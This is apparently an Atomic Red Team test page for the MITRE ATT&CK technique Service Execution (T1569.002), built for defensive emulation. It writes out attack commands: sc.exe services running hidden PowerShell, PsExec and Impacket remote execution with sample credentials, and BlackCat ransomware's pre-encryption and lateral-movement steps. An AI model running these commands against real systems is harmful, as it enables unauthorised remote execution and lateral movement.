# T1569.002 - System Services: Service Execution
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.

## Atomic Tests

### Atomic Test #1 - Execute a Command as a Service
Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.

Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`

[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)  
[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
sc.exe create ARTService binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
sc.exe start ARTService
sc.exe delete ARTService
```

In [ ]:
Invoke-AtomicTest T1569.002 -TestNumbers 1

### Atomic Test #2 - Use PsExec to execute a command on a remote host
Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
Will start a process on a remote host.

Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path "C:\PSTools\PsExec.exe") { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "C:\PSTools\PsExec.exe") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "C:\PSTools\PsExec.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1569.002 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\PSTools\PsExec.exe \\localhost -u DOMAIN\Administrator -p P@ssw0rd1 -accepteula "C:\Windows\System32\calc.exe"
```

In [ ]:
Invoke-AtomicTest T1569.002 -TestNumbers 2

### Atomic Test #3 - psexec.py (Impacket)
Will execute a command on the remote host with Impacket psexec.py script.

**Supported Platforms:** linux
#### Dependencies:  Run with `bash`!
##### Description: psexec.py (Impacket)

##### Check Prereq Commands:
```bash
if [ -x "$(command -v psexec.py)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
sudo pip3 install impacket

```

In [ ]:
Invoke-AtomicTest T1569.002 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
psexec.py '/Administrator:P@ssw0rd1@127.0.0.1' 'whoami'
```

In [ ]:
Invoke-AtomicTest T1569.002 -TestNumbers 3

### Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement
This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
cmd.exe /c "wmic 	csproduct 	get UUID" 
cmd.exe /c "fsutil behavior 	set SymlinkEvaluation R2L:1" 
cmd.exe /c "fsutil behavior set 	SymlinkEvaluation R2R:1"
reg    add    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters    /v MaxMpxCt /d 65535 /t REG_DWORD /f      
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
cmd.exe /c "$env:temp\psexec.exe  -accepteula  \\$ENV:COMPUTERNAME cmd.exe  /c echo "--access-token""
```

In [ ]:
Invoke-AtomicTest T1569.002 -TestNumbers 4

## Detection
Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).